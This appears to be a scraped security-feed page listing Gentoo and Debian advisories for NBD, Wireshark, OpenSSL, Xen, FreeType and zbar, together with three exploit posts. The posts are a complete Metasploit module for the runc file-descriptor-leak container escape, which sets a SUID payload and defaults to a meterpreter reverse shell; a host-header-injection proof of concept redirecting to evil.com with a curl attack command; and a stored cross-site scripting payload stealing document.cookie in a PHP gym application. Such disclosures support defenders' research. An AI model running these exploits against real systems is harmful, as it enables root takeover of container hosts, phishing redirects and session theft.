Gentoo Linux Security Advisory 202402-10 - Multiple vulnerabilities have been found in NBD Tools, the worst of which could result in arbitrary code execution. Versions greater than or equal to 3.24 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202402-10  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: NBD Tools: Multiple Vulnerabilities  
     Date: February 04, 2024  
     Bugs: #834678  
       ID: 202402-10

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been found in NBD Tools, the worst of  
which could result in arbitary code execution.

Background  
==========

The NBD Tools are the Network Block Device utilities allowing one to use  
remote block devices over a TCP/IP network. It includes a userland NBD  
server.

Affected packages  
=================

Package        Vulnerable    Unaffected  
-------------  ------------  ------------  
sys-block/nbd  < 3.24        >= 3.24

Description  
===========

Multiple vulnerabilities have been discovered in NBD Tools. Please  
review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All NBD Tools users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=sys-block/nbd-3.24"

References  
==========

[ 1 ] CVE-2022-26495  
      https://nvd.nist.gov/vuln/detail/CVE-2022-26495  
[ 2 ] CVE-2022-26496  
      https://nvd.nist.gov/vuln/detail/CVE-2022-26496

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202402-10

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202402-10

runc versions 1.1.11 and below, as used by containerization technologies such as Docker engine and Kubernetes, are vulnerable to an arbitrary file write vulnerability. Due to a file descriptor leak it is possible to mount the host file system with the permissions of runc (typically root). Successfully tested on Ubuntu 22.04 with runc 1.1.7-0ubuntu1~22.04.1 using Docker build.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Local  Rank = ExcellentRanking  include Msf::Post::Linux::Priv  include Msf::Post::Linux::System  include Msf::Post::File  include Msf::Exploit::EXE  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'runc (docker) File Descriptor Leak Privilege Escalation',        'Description' => %q{          All versions of runc <=1.1.11, as used by containerization technologies such as Docker engine,          and Kubernetes are vulnerable to an arbitrary file write.          Due to a file descriptor leak it is possible to mount the host file system          with the permissions of runc (typically root).          Successfully tested on Ubuntu 22.04 with runc 1.1.7-0ubuntu1~22.04.1 using Docker build.        },        'License' => MSF_LICENSE,        'Author' => [          'h00die', # msf module          'Rory McNamara' # Discovery        ],        'Platform' => [ 'linux' ],        'Arch' => [ ARCH_X86, ARCH_X64 ],        'SessionTypes' => [ 'shell', 'meterpreter' ],        'Targets' => [[ 'Auto', {} ]],        'Privileged' => true,        'References' => [          [ 'URL', 'https://snyk.io/blog/cve-2024-21626-runc-process-cwd-container-breakout/'],          [ 'URL', 'https://github.com/opencontainers/runc/security/advisories/GHSA-xr7r-f8xq-vfvv'],          [ 'CVE', '2024-21626']        ],        'DisclosureDate' => '2024-01-31',        'DefaultTarget' => 0,        'Notes' => {          'AKA' => ['Leaky Vessels'],          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [ARTIFACTS_ON_DISK]        },        'DefaultOptions' => {          'EXITFUNC' => 'thread',          'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',          'MeterpreterTryToFork' => true        }      )    )    register_advanced_options [      OptString.new('WritableDir', [ true, 'A directory where we can write and execute files', '/tmp' ]),      OptString.new('DOCKERIMAGE', [ true, 'A docker image to use', 'alpine:latest' ]),      OptInt.new('FILEDESCRIPTOR', [ true, 'The file descriptor to use, typically 7, 8 or 9', 8 ]),    ]  end  def base_dir    datastore['WritableDir'].to_s  end  def check    sys_info = get_sysinfo    unless sys_info[:distro] == 'ubuntu'      return CheckCode::Safe('Check method only available for Ubuntu systems')    end    return CheckCode::Safe('Check method only available for Ubuntu systems') if executable?('runc')    # Check the app is installed and the version, debian based example    package = cmd_exec('runc --version')    package = package.split[2] # runc, version, <the actual version>    if package&.include?('1.1.7-0ubuntu1~22.04.1') || # jammy 22.04 only has 2 releases, .1 (vuln) and .2       package&.include?('1.0.0~rc10-0ubuntu1') || # focal only had 1 release prior to patch, 1.1.7-0ubuntu1~20.04.2 is patched       package&.include?('1.1.7-0ubuntu2') # mantic only had 1 release prior to patch, 1.1.7-0ubuntu2.2 is patched      return CheckCode::Appears("Vulnerable runc version #{package} detected")    end    unless package&.include?('+esm') # bionic patched with 1.1.4-0ubuntu1~18.04.2+esm1 so anything w/o +esm is vuln      return CheckCode::Appears("Vulnerable runc version #{package} detected")    end    CheckCode::Safe("runc #{package} is not vulnerable")  end  def exploit    # Check if we're already root    if !datastore['ForceExploit'] && is_root?      fail_with Failure::None, 'Session already has root privileges. Set ForceExploit to override'    end    # Make sure we can write our exploit and payload to the local system    unless writable? base_dir      fail_with Failure::BadConfig, "#{base_dir} is not writable"    end    # create directory to write all our files to    dir = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"    mkdir(dir)    register_dirs_for_cleanup(dir)    # Upload payload executable    payload_path = "#{dir}/.#{rand_text_alphanumeric(5..10)}"    vprint_status("Uploading Payload to #{payload_path}")    write_file(payload_path, generate_payload_exe)    register_file_for_cleanup(payload_path)    # write docker file    vprint_status("Uploading Dockerfile to #{dir}/Dockerfile")    dockerfile = %(FROM #{datastore['DOCKERIMAGE']}    WORKDIR /proc/self/fd/#{datastore['FILEDESCRIPTOR']}    RUN cd #{'../' * 8} && chmod -R 777 #{dir[1..]} && chown -R root:root #{dir[1..]} && chmod u+s #{payload_path[1..]} )    write_file("#{dir}/Dockerfile", dockerfile)    register_file_for_cleanup("#{dir}/Dockerfile")    print_status('Building from Dockerfile to set our payload permissions')    output = cmd_exec "cd #{dir} && docker build ."    output.each_line { |line| vprint_status line.chomp }    # delete our docker image    if output =~ /Successfully built ([a-z0-9]+)$/      print_status("Removing created docker image #{Regexp.last_match(1)}")      output = cmd_exec "docker image rm #{Regexp.last_match(1)}"      output.each_line { |line| vprint_status line.chomp }    end    fail_with(Failure::NoAccess, "File Descriptor #{datastore['FILEDESCRIPTOR']} not available, try again (likely) or adjust FILEDESCRIPTOR.") if output.include? "mkdir /proc/self/fd/#{datastore['FILEDESCRIPTOR']}: not a directory"    fail_with(Failure::NoAccess, 'Payload SUID bit not set') unless get_suid_files(payload_path).include? payload_path    print_status("Payload permissions set, executing payload (#{payload_path})...")    cmd_exec "#{payload_path} &"  endend

runc 1.1.11 File Descriptor Leak Privilege Escalation

Debian Linux Security Advisory 5614-1 - Two vulnerabilities were discovered in zbar, a library for scanning and decoding QR and bar codes, which may result in denial of service, information disclosure or potentially the execution of arbitrary code if a specially crafted code is processed.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5614-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoFebruary 03, 2024                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : zbarCVE ID         : CVE-2023-40889 CVE-2023-40890Debian Bug     : 1051724Two vulnerabilities were discovered in zbar, a library for scanning anddecoding QR and bar codes, which may result in denial of service,information disclosure or potentially the execution of arbitrary code ifa specially crafted code is processed.For the oldstable distribution (bullseye), these problems have beenfixed in version 0.23.90-1+deb11u1.For the stable distribution (bookworm), these problems have been fixedin version 0.23.92-7+deb12u1.We recommend that you upgrade your zbar packages.For the detailed security status of zbar please refer to its securitytracker page at:https://security-tracker.debian.org/tracker/zbarFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmW+cM5fFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0RZEQ/+LBd+YadiS/TNfrBy9lYnugnavklh9VSEkO+sKYFVzkq/ypQwuaLA0MaIt0OOIGIrwDVXL0/Lb6Rjuo96PGQX6NJXF2iG7UUD8RjiJDHIFPUP9nbWOjXmNAdtnfUvF9AwyExSpCREhXc2PTDc5lmnAu56NWrJRN53RqngbYSxILoOpNRBDlZUEL3RNrbpPvpQnvIBo2JcmaT/PtgC+U5bxKfnQGQ2Cree/nyq8de9VCPwGeTczqFz8I3NsklG9k8/09+zdJOUpy+KVi+ylTAG/f/ydzGtrFyr++hPU692PIGeu++N3yNX1mP9KWhsAdkfL581RauwKRgHFnRXK/yUDg7rDUlMRd0w5QphDkL+01mjzgiooGBp5I7OGXvdVgribWdexRiKE0nfzf6sHxzbHXRdCOiPWhGAf5w6ORdpgRwuICo4mWTw1T8GJktFfuLXP7uRIdVIMeIVVVLfFYBQeTr8g7A0TV1ysAzG+yjHVhfYJxTVS9rTNmt8MJbO6ZBgWnMdMbd+4xlngWMpxDOInhdFBTmbyBdWnbMOQDZhgXLy0Hd0VF96UoQkWoHxphpbioY5on053jSsU6FH0r1bSm5rjOfCkRVLalCTjZyY4TqCSmbTlq3qyxUHgT9ws2M+//SpJKzwGvVXN8+0M3BzVXUGJYmLG0v0/+jb58wUBUA==OOtS-----END PGP SIGNATURE-----

Debian Security Advisory 5614-1

SISQUAL WFM version 7.1.319.103 suffers from a host header injection vulnerability.

    # Exploit Title: SISQUAL WFM 7.1.319.103 Host Header Injection# Discovered Date: 17/03/2023# Reported Date: 17/03/2023# Exploit Author: Omer Shaik (unknown_exploit)# Vendor Homepage: https://www.sisqualwfm.com# Version: 7.1.319.103# Tested on: SISQUAL WFM 7.1.319.103# Affected Version: sisqualWFM - 7.1.319.103# Fixed Version: sisqualWFM - 7.1.319.111# CVE : CVE-2023-36085# CVSS: 3.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)# Category: Web Apps# Reference: https://github.com/omershaik0/Handmade_Exploits/tree/main/SISQUALWFM-Host-Header-Injection-CVE-2023-36085A proof-of-concept(POC) scenario that demonstrates a potential host header injection vulnerability in sisqualWFM version 7.1.319.103, specifically targeting the /sisqualIdentityServer/core endpoint. This vulnerability could be exploited by an attacker to manipulate webpage links or redirect users to another site with ease, simply by tampering with the host header.****************************************************************************************************Orignal Request****************************************************************************************************GET /sisqualIdentityServer/core/login HTTP/2Host: sisqualwfm.cloudCookie:<cookie>Sec-Ch-Ua: "Not A(Brand";v="24", "Chromium";v="110"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Linux"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9****************************************************************************************************Orignal Response****************************************************************************************************HTTP/2 302 FoundCache-Control: no-store, no-cache, must-revalidateLocation: https://sisqualwfm.cloud/sisqualIdentityServer/core/Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Content-Type-Options: nosniffX-Frame-Options: sameoriginDate: Wed, 22 Mar 2023 13:22:10 GMTContent-Length: 0****************************************************************************************************██████╗  ██████╗  ██████╗██╔══██╗██╔═══██╗██╔════╝██████╔╝██║   ██║██║     ██╔═══╝ ██║   ██║██║     ██║     ╚██████╔╝╚██████╗╚═╝      ╚═════╝  ╚═════╝                ****************************************************************************************************Request has been modified to redirect user to evil.com (Intercepted request using Burp proxy)****************************************************************************************************GET /sisqualIdentityServer/core/login HTTP/2Host: evil.comCookie:<cookie>Sec-Ch-Ua: "Not A(Brand";v="24", "Chromium";v="110"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Linux"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9****************************************************************************************************Response****************************************************************************************************HTTP/2 302 FoundCache-Control: no-store, no-cache, must-revalidateLocation: https://evil.com/sisqualIdentityServer/core/Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Content-Type-Options: nosniffX-Frame-Options: sameoriginContent-Length: 0****************************************************************************************************Method of Attack****************************************************************************************************curl -k --header "Host: attack.host.com" "Domain Name + /sisqualIdentityServer/core" -vvv****************************************************************************************************

SISQUAL WFM 7.1.319.103 Host Header Injection

Gentoo Linux Security Advisory 202402-9 - Multiple out-of-bounds read vulnerabilities have been discovered in Wireshark. Versions greater than or equal to 4.0.11 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202402-09  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Low  
    Title: Wireshark: Multiple Vulnerabilities  
     Date: February 04, 2024  
     Bugs: #915224, #917421  
       ID: 202402-09

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple out-of-bounds read vulnerabilities have been discovered in  
Wireshark.

Background  
==========

Wireshark is a versatile network protocol analyzer.

Affected packages  
=================

Package                 Vulnerable    Unaffected  
----------------------  ------------  ------------  
net-analyzer/wireshark  < 4.0.11      >= 4.0.11

Description  
===========

Multiple vulnerabilities have been discovered in Wireshark. Please  
review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Wireshark users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-analyzer/wireshark-4.0.11"

References  
==========

[ 1 ] CVE-2023-5371  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5371  
[ 2 ] CVE-2023-6174  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6174  
[ 3 ] WNPA-SEC-2023-27  
[ 4 ] WNPA-SEC-2023-28

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202402-09

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202402-09

Gentoo Linux Security Advisory 202402-8 - Multiple vulnerabilities have been found in OpenSSL, the worst of which could result in denial of service. Versions greater than or equal to 3.0.10 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202402-08  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: OpenSSL: Multiple Vulnerabilities  
     Date: February 04, 2024  
     Bugs: #876787, #893446, #902779, #903545, #907413, #910556, #911560  
       ID: 202402-08

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been found in OpenSSL, the worst of which  
could result in denial of service.

Background  
==========

OpenSSL is an Open Source toolkit implementing the Secure Sockets Layer  
(SSL v2/v3) and Transport Layer Security (TLS v1) as well as a general  
purpose cryptography library.

Affected packages  
=================

Package           Vulnerable    Unaffected  
----------------  ------------  ------------  
dev-libs/openssl  < 3.0.10      >= 3.0.10

Description  
===========

Multiple vulnerabilities have been discovered in OpenSSL. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All OpenSSL users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-libs/openssl-3.0.10"

References  
==========

[ 1 ] CVE-2022-3358  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3358  
[ 2 ] CVE-2022-4203  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4203  
[ 3 ] CVE-2022-4304  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4304  
[ 4 ] CVE-2022-4450  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4450  
[ 5 ] CVE-2023-0215  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0215  
[ 6 ] CVE-2023-0216  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0216  
[ 7 ] CVE-2023-0217  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0217  
[ 8 ] CVE-2023-0286  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0286  
[ 9 ] CVE-2023-0401  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0401  
[ 10 ] CVE-2023-0464  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0464  
[ 11 ] CVE-2023-0465  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0465  
[ 12 ] CVE-2023-0466  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0466  
[ 13 ] CVE-2023-2650  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2650  
[ 14 ] CVE-2023-2975  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2975  
[ 15 ] CVE-2023-3446  
      https://nvd.nist.gov/vuln/detail/CVE-2023-3446  
[ 16 ] CVE-2023-3817  
      https://nvd.nist.gov/vuln/detail/CVE-2023-3817

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202402-08

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202402-08

Gentoo Linux Security Advisory 202402-7 - Multiple vulnerabilities have been found in Xen, the worst of which can lead to arbitrary code execution. Versions greater than or equal to 4.16.6_pre1 are affected.

    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -Gentoo Linux Security Advisory                           GLSA 202402-07- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -                                           https://security.gentoo.org/- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High    Title: Xen: Multiple Vulnerabilities     Date: February 04, 2024     Bugs: #754105, #757126, #826998, #837575, #858122, #876790, #879031, #903624, #905389, #915970       ID: 202402-07- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -Synopsis========Multiple vulnerabilities have been found in Xen, the worst of which canlead to arbitrary code execution.Background==========Xen is a bare-metal hypervisor.Affected packages=================Package            Vulnerable     Unaffected-----------------  -------------  --------------app-emulation/xen  < 4.16.6_pre1  >= 4.16.6_pre1Description===========Multiple vulnerabilities have been discovered in Xen. Please review theCVE identifiers referenced below for details.Impact======Please review the referenced CVE identifiers for details.Workaround==========There is no known workaround at this time.Resolution==========All Xen users should upgrade to the latest version:  # emerge --sync  # emerge --ask --oneshot --verbose ">=app-emulation/xen-4.16.6_pre1"References==========[ 1 ] CVE-2021-28703      https://nvd.nist.gov/vuln/detail/CVE-2021-28703[ 2 ] CVE-2021-28704      https://nvd.nist.gov/vuln/detail/CVE-2021-28704[ 3 ] CVE-2021-28705      https://nvd.nist.gov/vuln/detail/CVE-2021-28705[ 4 ] CVE-2021-28706      https://nvd.nist.gov/vuln/detail/CVE-2021-28706[ 5 ] CVE-2021-28707      https://nvd.nist.gov/vuln/detail/CVE-2021-28707[ 6 ] CVE-2021-28708      https://nvd.nist.gov/vuln/detail/CVE-2021-28708[ 7 ] CVE-2021-28709      https://nvd.nist.gov/vuln/detail/CVE-2021-28709[ 8 ] CVE-2022-23816      https://nvd.nist.gov/vuln/detail/CVE-2022-23816[ 9 ] CVE-2022-23824      https://nvd.nist.gov/vuln/detail/CVE-2022-23824[ 10 ] CVE-2022-23825      https://nvd.nist.gov/vuln/detail/CVE-2022-23825[ 11 ] CVE-2022-26356      https://nvd.nist.gov/vuln/detail/CVE-2022-26356[ 12 ] CVE-2022-26357      https://nvd.nist.gov/vuln/detail/CVE-2022-26357[ 13 ] CVE-2022-26358      https://nvd.nist.gov/vuln/detail/CVE-2022-26358[ 14 ] CVE-2022-26359      https://nvd.nist.gov/vuln/detail/CVE-2022-26359[ 15 ] CVE-2022-26360      https://nvd.nist.gov/vuln/detail/CVE-2022-26360[ 16 ] CVE-2022-26361      https://nvd.nist.gov/vuln/detail/CVE-2022-26361[ 17 ] CVE-2022-27672      https://nvd.nist.gov/vuln/detail/CVE-2022-27672[ 18 ] CVE-2022-29900      https://nvd.nist.gov/vuln/detail/CVE-2022-29900[ 19 ] CVE-2022-29901      https://nvd.nist.gov/vuln/detail/CVE-2022-29901[ 20 ] CVE-2022-33746      https://nvd.nist.gov/vuln/detail/CVE-2022-33746[ 21 ] CVE-2022-33747      https://nvd.nist.gov/vuln/detail/CVE-2022-33747[ 22 ] CVE-2022-33748      https://nvd.nist.gov/vuln/detail/CVE-2022-33748[ 23 ] CVE-2022-33749      https://nvd.nist.gov/vuln/detail/CVE-2022-33749[ 24 ] CVE-2022-42309      https://nvd.nist.gov/vuln/detail/CVE-2022-42309[ 25 ] CVE-2022-42310      https://nvd.nist.gov/vuln/detail/CVE-2022-42310[ 26 ] CVE-2022-42319      https://nvd.nist.gov/vuln/detail/CVE-2022-42319[ 27 ] CVE-2022-42320      https://nvd.nist.gov/vuln/detail/CVE-2022-42320[ 28 ] CVE-2022-42321      https://nvd.nist.gov/vuln/detail/CVE-2022-42321[ 29 ] CVE-2022-42322      https://nvd.nist.gov/vuln/detail/CVE-2022-42322[ 30 ] CVE-2022-42323      https://nvd.nist.gov/vuln/detail/CVE-2022-42323[ 31 ] CVE-2022-42324      https://nvd.nist.gov/vuln/detail/CVE-2022-42324[ 32 ] CVE-2022-42325      https://nvd.nist.gov/vuln/detail/CVE-2022-42325[ 33 ] CVE-2022-42326      https://nvd.nist.gov/vuln/detail/CVE-2022-42326[ 34 ] CVE-2022-42327      https://nvd.nist.gov/vuln/detail/CVE-2022-42327[ 35 ] CVE-2022-42330      https://nvd.nist.gov/vuln/detail/CVE-2022-42330[ 36 ] CVE-2022-42331      https://nvd.nist.gov/vuln/detail/CVE-2022-42331[ 37 ] CVE-2022-42332      https://nvd.nist.gov/vuln/detail/CVE-2022-42332[ 38 ] CVE-2022-42333      https://nvd.nist.gov/vuln/detail/CVE-2022-42333[ 39 ] CVE-2022-42334      https://nvd.nist.gov/vuln/detail/CVE-2022-42334[ 40 ] CVE-2022-42335      https://nvd.nist.gov/vuln/detail/CVE-2022-42335[ 41 ] XSA-351[ 42 ] XSA-355[ 43 ] XSA-385[ 44 ] XSA-387[ 45 ] XSA-388[ 46 ] XSA-389[ 47 ] XSA-397[ 48 ] XSA-399[ 49 ] XSA-400[ 50 ] XSA-407[ 51 ] XSA-412[ 52 ] XSA-414[ 53 ] XSA-415[ 54 ] XSA-416[ 55 ] XSA-417[ 56 ] XSA-418[ 57 ] XSA-419[ 58 ] XSA-420[ 59 ] XSA-421[ 60 ] XSA-422[ 61 ] XSA-425[ 62 ] XSA-430Availability============This GLSA and any updates to it are available for viewing atthe Gentoo Security Website: https://security.gentoo.org/glsa/202402-07Concerns?=========Security is a primary focus of Gentoo Linux and ensuring theconfidentiality and security of our users' machines is of utmostimportance to us. Any security concerns should be addressed tosecurity@gentoo.org or alternatively, you may file a bug athttps://bugs.gentoo.org.License=======Copyright 2024 Gentoo Foundation, Inc; referenced textbelongs to its owner(s).The contents of this document are licensed under theCreative Commons - Attribution / Share Alike license.https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202402-07

Gentoo Linux Security Advisory 202402-6 - Multiple vulnerabilities have been discovered in FreeType, the worst of which can lead to remote code execution. Versions greater than or equal to 2.13.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202402-06  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: FreeType: Multiple Vulnerabilities  
     Date: February 03, 2024  
     Bugs: #840224, #881443  
       ID: 202402-06

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in FreeType, the worst of  
which can lead to remote code execution.

Background  
==========

FreeType is a high-quality and portable font engine.

Affected packages  
=================

Package              Vulnerable    Unaffected  
-------------------  ------------  ------------  
media-libs/freetype  < 2.13.0      >= 2.13.0

Description  
===========

Multiple vulnerabilities have been discovered in FreeType. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All FreeType users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=media-libs/freetype-2.13.0"

References  
==========

[ 1 ] CVE-2022-27404  
      https://nvd.nist.gov/vuln/detail/CVE-2022-27404  
[ 2 ] CVE-2022-27405  
      https://nvd.nist.gov/vuln/detail/CVE-2022-27405  
[ 3 ] CVE-2022-27406  
      https://nvd.nist.gov/vuln/detail/CVE-2022-27406  
[ 4 ] CVE-2023-2004  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2004

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202402-06

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202402-06

Gym Management System version 1.0 suffers from a persistent cross site scripting vulnerability. Original credit for this finding goes to Jyotsna Adhana in October of 2020 but uses a different vector of attack for this software version.

    # Exploit Title: GYM MS - GYM Management System - Cross Site Scripting (Stored)# Date: 29/09/2023# Vendor Homepage: https://phpgurukul.com/gym-management-system-using-php-and-mysql/# Software Link: https://phpgurukul.com/projects/GYM-Management-System-using-PHP.zip# Version: 1.0# Last Update: 31 August 2022# Tested On: Kali Linux 6.1.27-1kali1 (2023-05-12) x86_64 + XAMPP 7.4.30# 1: Create user, login and go to profile.php# 2: Use payload x%22%20onmouseover%3Dalert%28document.cookie%29%20x%3D%22 in lname field.# 3: When entering the profile.php page, document.cookie will be reflected every time.# AuthorThis vulnerability was detected by Alperen Yozgat while testing with the Rapplex - Web Application Security Scanner.# About RapplexRapplex is a web applicaton security scanner that scans and reports vulnerabilities in websites.Pentesters can use it as an automation tool for daily tasks but "Pentester Studio" will provide such a great addition as well in their manual assessments.So, the software does not need separate development tools to discover different types of vulnerabilities or to develop existing engines. "Exploit" tools are available to take advantage of vulnerabilities such as SQL Injection, Code Injection, Fle Incluson.# HTTP Request POST /gym/profile.php HTTP/1.1Host: localhostContent-Length: 129Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Cookie: PHPSESSID=76e2048c174c1a5d46e203df87672c25 #CHANGEConnection: closefname=test&lname=x%22%20onmouseover%3Dalert%28document.cookie%29%20x%3D%22&email=john%40test.com&mobile=1425635241&state=Delhi&city=New+Delhi&address=ABC+Street+XYZ+Colony&submit=Update

GYM MS 1.0 Cross Site Scripting

